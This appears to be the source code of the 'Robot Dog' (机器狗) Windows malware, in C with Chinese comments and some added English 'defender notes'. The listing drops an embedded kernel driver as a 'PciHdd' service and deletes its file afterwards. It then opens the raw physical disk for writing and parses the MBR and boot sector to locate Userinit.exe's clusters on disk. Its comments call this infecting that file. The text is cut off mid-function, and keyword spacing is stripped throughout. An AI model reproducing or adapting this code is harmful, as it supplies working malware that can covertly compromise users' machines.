机器狗源码.docx
机器狗源码
机器狗源码(C语言的)
//Test.cpp: 定义控制台应用程序的入口点。
//
#include"stdafx.h"
//==============================================================================
#include
// One 16-byte entry of the MBR partition table (MBR_SECTOR below holds four of
// them). Field comments are translated from the original listing.
// NOTE(review): keyword/identifier spacing in this listing was stripped by the
// document extraction; the code lines are kept exactly as found.
typedefstruct_PARTITION_ENTRY
{
UCHARactive;//boot indicator; 0x80 marks the active (bootable) partition, which is what WriteVirusToDisk tests for
UCHARStartHead;//starting head of the partition
UCHARStartSector;//high 2 bits: starting cylinder bits 8-9; low 6 bits: starting sector number
UCHARStartCylinder;//low 8 bits of the starting cylinder
UCHARPartitionType;//partition type id; this file only accepts the NTFS and FAT32 ids defined below
UCHAREndHead;//ending head of the partition
UCHAREndSector;//high 2 bits: ending cylinder bits 8-9; low 6 bits: ending sector number
UCHAREndCylinder;//low 8 bits of the ending cylinder
ULONGStartLBA;//first sector (LBA) of the partition; used to locate the volume boot sector on the raw disk
ULONGTotalSector;//partition size in sectors
}PARTITION_ENTRY,*PPARTITION_ENTRY;
//==============================================================================
// Master Boot Record layout: sector 0 of the physical disk. WriteVirusToDisk
// reads it straight from the raw disk device and only consults Partition[0].
typedefstruct_MBR_SECTOR
{
UCHARBootCode[446];//boot loader code
PARTITION_ENTRYPartition[4];//primary partition table
USHORTSignature;//2-byte boot signature (not validated anywhere in this listing)
}MBR_SECTOR,*PMBR_SECTOR;
//==============================================================================
// Volume boot sector (BIOS Parameter Block) as read from the first sector of
// the active partition. Of these fields the listing actually uses
// SectorsPerCluster, ReservedSectors, NumberOfFATs and SectorsPerFAT32 to turn
// a logical cluster number into a raw disk offset. Comments translated from
// the original.
typedefstruct_BBR_SECTOR
{
USHORTJmpCode;//2-byte jump instruction to the boot code
UCHARNopCode;//1-byte nop padding so the jump occupies 3 bytes
UCHAROEMName[8];//8-byte OEM name
//from here on: BPB (BIOS Parameter Block)
USHORTBytesPerSector;//bytes per sector (512, 1024, 2048 or 4096)
UCHARSectorsPerCluster;//sectors per cluster (1,2,4,8,16,32,64,128); product with BytesPerSector must not exceed 32K (max cluster size)
USHORTReservedSectors;//reserved sectors counted from the first sector of the volume; must not be 0; typically 1 for FAT12/FAT16 and 32 for FAT32
UCHARNumberOfFATs;//number of FAT structures on the volume, normally 2 [unused by NTFS, must be 0 there]
USHORTRootEntries;//FAT12/FAT16: number of 32-byte root directory entries; must be 0 for FAT32 [unused by NTFS]
USHORTNumberOfSectors16;//total sectors on the volume; may be 0, in which case NumberOfSectors32 must be nonzero; must be 0 for FAT32 [unused by FAT32/NTFS]
UCHARMediaDescriptor;//media type
USHORTSectorsPerFAT16;//sectors occupied by one FAT (FAT12/FAT16); must be 0 for FAT32 [unused by FAT32/NTFS]
USHORTSectorsPerTrack;//sectors per track as reported for INT 0x13
USHORTHeadsPerCylinder;//heads per cylinder as reported for INT 0x13
ULONGHiddenSectors;//hidden sectors preceding the partition that holds this FAT volume
ULONGNumberOfSectors32;//total sectors on the volume; nonzero for FAT32; FAT12/FAT16 use it when the count exceeds 65536 [unused by NTFS]
//from here on: EBPB (Extended BIOS Parameter Block)
ULONGSectorsPerFAT32;//FAT32: size of one FAT in sectors (SectorsPerFAT16 must then be 0)
}BBR_SECTOR,*PBBR_SECTOR;
#include
// MBR partition type ids accepted by WriteVirusToDisk; any other id is rejected.
#definePARTITION_TYPE_NTFS0x07
#definePARTITION_TYPE_FAT320x0B
#definePARTITION_TYPE_FAT32_LBA0x0C
//==============================================================================
// Host artifacts this dropper touches. For defenders these are the file-system
// and device-name indicators to hunt for:
//   STR_SYSFILE_PATH  - where the embedded driver is written before the
//                       "PciHdd" service is created (deleted again after start).
//   STR_VIRFILE_PATH  - the file that the listing's header describes as the
//                       infection target; not referenced in the visible portion.
//   STR_DSKDEVICE_NAME - raw physical disk, opened GENERIC_READ|GENERIC_WRITE
//                       from user mode by WriteVirusToDisk.
//   STR_HDDDEVICE_NAME - non-standard device name, opened GENERIC_READ;
//                       presumably exposed by the dropped driver (not shown here).
#defineSTR_SYSFILE_PATHTEXT("%SystemRoot%\\system32\\drivers\\pcihdd.sys")
#defineSTR_VIRFILE_PATHTEXT("%SystemRoot%\\System32\\Userinit.exe")
#defineSTR_DSKDEVICE_NAMETEXT("\\\\.\\PhysicalDrive0")
#defineSTR_HDDDEVICE_NAMETEXT("\\\\.\\PhysicalHardDisk0")
//==============================================================================
// Private IOCTL for the dropped driver; not used in the visible portion of
// this listing.
#defineIOCTL_MYDEV_BASE0xF000
#defineIOCTL_MYDEV_Fun_0xF01CTL_CODE(IOCTL_MYDEV_BASE,0xF01,METHOD_BUFFERED,FILE_ANY_ACCESS)
//==============================================================================
// Drops the driver image embedded in the executable's resources and loads it
// as a kernel service.
//
// Steps, as written below:
//   1. Find resource id 1001 (type 1001) in ModuleHandle, lock it and write its
//      bytes to STR_SYSFILE_PATH with %SystemRoot% expanded.
//   2. Create a SERVICE_KERNEL_DRIVER service named "PciHdd" (demand start).
//      If CreateService fails, any existing "PciHdd" service is stopped,
//      deleted and created again.
//   3. Re-open the service with SERVICE_START and call StartService.
//   4. FunExit01 deletes the dropped .sys file. That label is reached on every
//      path after the file was written, including success, so the driver file
//      is transient on disk while the service configuration and the loaded
//      driver are left in place (nothing here stops or deletes them on success).
//
// Parameters:
//   ModuleHandle - module whose resource section contains the driver image.
// Returns: ERROR_SUCCESS, or GetLastError() from the first failing call.
//
// Defender notes: the durable artifacts are a kernel-driver service named
// "PciHdd" whose image path points at system32\drivers\pcihdd.sys, a
// short-lived file at that path, and a driver load initiated by a user-mode
// process holding SC_MANAGER_ALL_ACCESS.
DWORDInstallAndStartDriver(HMODULEModuleHandle)
{
TCHARfilePath[MAX_PATH];
HANDLEfileHandle;
HRSRChSysRes;
DWORDdwWritten;
DWORDdwSysLen;
PVOIDlpSysBuf;
SC_HANDLEhSCManager;
SC_HANDLEhService;
SERVICE_STATUSsService;
DWORDerrCode=ERROR_SUCCESS;
// Locate the embedded driver (resource 1001/1001), expand the target path and
// open it for writing; any failure here leaves nothing on disk to clean up.
if(
(NULL==(hSysRes=FindResource(ModuleHandle,(LPCTSTR)1001,(LPCTSTR)1001)))
||
(0==(dwSysLen=SizeofResource(ModuleHandle,hSysRes)))
||
(NULL==(lpSysBuf=LockResource(hSysRes)))
||
(0==ExpandEnvironmentStrings(STR_SYSFILE_PATH,&filePath[0],sizeof(filePath)))
||
(INVALID_HANDLE_VALUE==(fileHandle=CreateFile(filePath,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL)))
)
{
errCode=GetLastError();
gotoFunExit00;
}
// Write the driver image to disk; OPEN_ALWAYS above means an existing file is
// reused, so SetEndOfFile truncates any leftover tail.
if(
!
WriteFile(fileHandle,lpSysBuf,dwSysLen,&dwWritten,NULL)
||
!
SetEndOfFile(fileHandle)
||
!
FlushFileBuffers(fileHandle)
)
{
errCode=GetLastError();
}
CloseHandle(fileHandle);
// The file exists from here on, so later failures go to FunExit01 to remove it.
if(ERROR_SUCCESS!
=errCode)
{
gotoFunExit01;
}
if(NULL==(hSCManager=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS)))
{
errCode=GetLastError();
gotoFunExit01;
}
// First attempt: register "PciHdd" as a demand-start kernel driver.
hService=CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL!
=hService)
{
// Created; the handle is closed and the service re-opened below with SERVICE_START.
CloseServiceHandle(hService);
}
else
{
// CreateService failed (e.g. a "PciHdd" service from an earlier run already
// exists): stop and delete it, then create it again.
if(NULL!
=(hService=OpenService(hSCManager,TEXT("PciHdd"),SERVICE_ALL_ACCESS)))
{
ControlService(hService,SERVICE_CONTROL_STOP,&sService);
DeleteService(hService);
CloseServiceHandle(hService);
}
hService=CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL!
=hService)
{
CloseServiceHandle(hService);
}
else
{
errCode=GetLastError();
gotoFunExit02;
}
}
if(NULL==(hService=OpenService(hSCManager,TEXT("PciHdd"),SERVICE_START)))
{
errCode=GetLastError();
gotoFunExit02;
}
// Load the driver. The result is not examined, so errCode stays ERROR_SUCCESS
// regardless of whether the driver actually started.
StartService(hService,0,NULL);
CloseServiceHandle(hService);
FunExit02:
CloseServiceHandle(hSCManager);
FunExit01:
// Remove the dropped driver file (also on the success path, see header comment).
DeleteFile(filePath);
FunExit00:
returnerrCode;
}
//==============================================================================
// Undoes InstallAndStartDriver: stops and deletes the "PciHdd" service, then
// deletes the driver file at STR_SYSFILE_PATH.
//
// Returns: ERROR_SUCCESS, or GetLastError() from OpenSCManager / OpenService.
// The file deletion at FunExit00 runs on every path, even when the service
// manager or the service could not be opened.
//
// Defender note: because DeleteFile is unconditional, absence of pcihdd.sys on
// disk says nothing about whether the service configuration was removed or the
// driver unloaded; check the service entry as well.
DWORDStopAndDeleteDriver(VOID)
{
TCHARfilePath[MAX_PATH];
SC_HANDLEhSCManager;
SC_HANDLEhService;
SERVICE_STATUSsService;
DWORDerrCode=ERROR_SUCCESS;
if(NULL==(hSCManager=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS)))
{
errCode=GetLastError();
gotoFunExit00;
}
if(NULL==(hService=OpenService(hSCManager,TEXT("PciHdd"),SERVICE_ALL_ACCESS)))
{
errCode=GetLastError();
gotoFunExit01;
}
// Stop, then unregister, the driver service; results are not checked.
ControlService(hService,SERVICE_CONTROL_STOP,&sService);
DeleteService(hService);
CloseServiceHandle(hService);
FunExit01:
CloseServiceHandle(hSCManager);
FunExit00:
// Reached on all paths: expand the driver path and delete the file.
ExpandEnvironmentStrings(STR_SYSFILE_PATH,&filePath[0],sizeof(filePath));
DeleteFile(filePath);
returnerrCode;
}
//==============================================================================
//感染硬盘第一个分区的指定的文件
//
//1)通过FSCTL_GET_RETRIEVAL_POINTERS获取文件数据的分布信息
//
//2)通过直接访问硬盘(\\\\.\\PhysicalHardDisk0)的的MDR和第一个分区的引导扇区得到分区参数来定位文件。
//
//3)通过对比ReadFile读取的文件数据和自己定位后直接读取所得到的文件数据,确定定位是否正确
//
//入口参数:
//要感染的文件名(完整路径)
//
//Returnvalue:
//Success->NULL
//Failed->指向出错信息的指针
//==============================================================================
DWORDWriteVirusToDisk(LPCTSTRVirusFile)
{
STARTING_VCN_INPUT_BUFFERiVcnBuf;
UCHARoVcnBuf[272];
PRETRIEVAL_POINTERS_BUFFERlpVcnBuf;
DWORDdwVcnExtents;
LARGE_INTEGERstartLcn;
PUCHARlpClusterBuf;
DWORDdwClusterLen;
UCHARdataBuf[512];
UCHARdiskBuf[512];
DWORDdataLen;
LARGE_INTEGERdiskPos;
PPARTITION_ENTRYlpPartition;
ULONGdwPartitionStart;
ULONGdwPartitionType;
PBBR_SECTORlpBootSector;
DWORDSectorsPerCluster;
HANDLEhHddDevice;
HANDLEhDskDevice;
HANDLEhVirusFile;
DWORDerrCode=ERROR_SUCCESS;
if(INVALID_HANDLE_VALUE==(hHddDevice=CreateFileA(STR_HDDDEVICE_NAME,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL)))
{
errCode=GetLastError();
gotoFunExit00;
}
//
if(INVALID_HANDLE_VALUE==(hVirusFile=CreateFileA(VirusFile,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_FLAG_NO_BUFFERING,NULL)))
{
errCode=GetLastError();
gotoFunExit01;
}
iVcnBuf.StartingVcn.QuadPart=0;
RtlZeroMemory(oVcnBuf,sizeof(oVcnBuf));
if(!
DeviceIoControl(hVirusFile,FSCTL_GET_RETRIEVAL_POINTERS,&iVcnBuf,sizeof(iVcnBuf),&oVcnBuf[0],sizeof(oVcnBuf),&dataLen,NULL))
{
errCode=GetLastError();
gotoFunExit02;
}
lpVcnBuf=(PRETRIEVAL_POINTERS_BUFFER)&oVcnBuf[0];
dwVcnExtents=lpVcnBuf->ExtentCount;
startLcn=lpVcnBuf->Extents[0].Lcn;
if(!
dwVcnExtents)
{
errCode=(ULONG)(-3);//文件太小,不能操作
gotoFunExit02;
}
if(startLcn.QuadPart==-1)
{
errCode=(ULONG)(-4);//该文件是压缩文件,不能操作
gotoFunExit02;
}
ReadFile(hVirusFile,dataBuf,sizeof(dataBuf),&dataLen,NULL);
//打开第一个物理硬盘
if(INVALID_HANDLE_VALUE==(hDskDevice=CreateFileA(STR_DSKDEVICE_NAME,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL)))
{
errCode=GetLastError();
gotoFunExit02;
}
//读取硬盘第一个扇区(MBR)
SetFilePointer(hDskDevice,0,NULL,FILE_BEGIN);
ReadFile(hDskDevice,diskBuf,sizeof(diskBuf),&dataLen,NULL);
lpPartition=&(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
if(lpPartition[0].active!
=0x80)
{
errCode=(ULONG)(-1);//分区不是启动分区
gotoFunExit03;
}
dwPartitionType=lpPartition[0].PartitionType;
if(
dwPartitionType!
=PARTITION_TYPE_FAT32
&&
dwPartitionType!
=PARTITION_TYPE_FAT32_LBA
&&
dwPartitionType!
=PARTITION_TYPE_NTFS
)
{
errCode=(ULONG)(-2);//不支持的磁盘分区
gotoFunExit03;
}
dwPartitionStart=lpPartition[0].StartLBA;
diskPos.QuadPart=dwPartitionStart*512;
//读取启动分区的第一个扇区(启动扇区)
SetFilePointer(hDskDevice,diskPos.LowPart,&diskPos.HighPart,FILE_BEGIN);
ReadFile(hDskDevice,diskBuf,sizeof(diskBuf),&dataLen,NULL);
lpBootSector=(PBBR_SECTOR)&diskBuf[0];
SectorsPerCluster=lpBootSector->SectorsPerCluster;
//根据FAT32/NTFS计算Userinit的起始簇的偏移量
diskPos.QuadPart=dwPartitionStart;
diskPos.QuadPart+=lpBootSector->ReservedSectors;
if(dwPartitionType==PARTITION_TYPE_FAT32||dwPartitionType==PARTITION_TYPE_FAT32_LBA)
{
diskPos.QuadPart+=lpBootSector->NumberOfFATs*lpBootSector->SectorsPerFAT32;
}
diskPos.QuadPart+=startLcn.QuadPart*SectorsPerCluster;
diskPos.QuadPart*=512;
//检查文件寻址
SetFilePointer(hDskDevice,diskPos.LowPart,&diskPos.HighPart,FILE_BEGIN);
ReadFile(hDskDevice,diskBuf,sizeof(diskBuf),&dataLen,NULL);
if(!
RtlEqualMemory(dataBuf,diskBuf,sizeof(diskBuf)))
{
errCode=(ULONG)(-5);//寻址文件不成功
gotoFunExit03;
}
//分配缓冲
dwClust